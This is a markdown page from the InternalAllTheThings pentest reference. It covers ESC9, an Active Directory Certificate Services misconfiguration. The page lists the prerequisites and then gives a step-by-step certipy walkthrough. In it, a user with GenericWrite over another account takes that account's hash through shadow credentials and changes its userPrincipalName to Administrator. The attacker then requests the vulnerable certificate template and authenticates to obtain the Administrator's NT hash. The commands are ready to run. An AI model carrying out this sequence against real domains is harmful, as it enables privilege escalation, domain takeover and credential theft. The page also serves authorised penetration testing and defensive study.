ad-adcs-esc09.md (2288B)
1 --- 2 title: "Active Directory - Certificate ESC9" 3 section: "Active Directory" 4 sectionSlug: "active-directory" 5 sourcePath: "docs/active-directory/ad-adcs-esc09.md" 6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/ad-adcs-esc09.md" 7 sha: "203bb0c0b290" 8 isIndex: false 9 --- 10 11 # Active Directory - Certificate ESC9 12 13 ## ESC9 - No Security Extension 14 15 **Requirements** 16 17 * `StrongCertificateBindingEnforcement` set to `1` (default) or `0` 18 * Certificate contains the `CT_FLAG_NO_SECURITY_EXTENSION` flag in the `msPKI-Enrollment-Flag` value 19 * Certificate specifies `Any Client` authentication EKU 20 * `GenericWrite` over any account A to compromise any account B 21 22 **Scenario** 23 24 <John@corp.local> has **GenericWrite** over <Jane@corp.local>, and we want to compromise <Administrator@corp.local>. 25 <Jane@corp.local> is allowed to enroll in the certificate template ESC9 that specifies the **CT_FLAG_NO_SECURITY_EXTENSION** flag in the **msPKI-Enrollment-Flag** value. 26 27 * Obtain the hash of Jane with Shadow Credentials (using our GenericWrite) 28 29 ```ps1 30 certipy shadow auto -username John@corp.local -p Passw0rd -account Jane 31 ``` 32 33 * Change the **userPrincipalName** of Jane to be Administrator. :warning: leave the `@corp.local` part 34 35 ```ps1 36 certipy account update -username John@corp.local -password Passw0rd -user Jane -upn Administrator 37 ``` 38 39 * Request the vulnerable certificate template ESC9 from Jane's account. 40 41 ```ps1 42 certipy req -username jane@corp.local -hashes ... -ca corp-DC-CA -template ESC9 43 # userPrincipalName in the certificate is Administrator 44 # the issued certificate contains no "object SID" 45 ``` 46 47 * Restore userPrincipalName of Jane to <Jane@corp.local>. 48 49 ```ps1 50 certipy account update -username John@corp.local -password Passw0rd -user Jane@corp.local 51 ``` 52 53 * Authenticate with the certificate and receive the NT hash of the <Administrator@corp.local> user. 54 55 ```ps1 56 certipy auth -pfx administrator.pfx -domain corp.local 57 # Add -domain <domain> to your command line since there is no domain specified in the certificate. 58 ``` 59 60 ## References 61 62 * [GOAD - part 14 - ADCS 5/7/9/10/11/13/14/15 - Mayfly - March 10, 2025](https://mayfly277.github.io/posts/ADCS-part14/)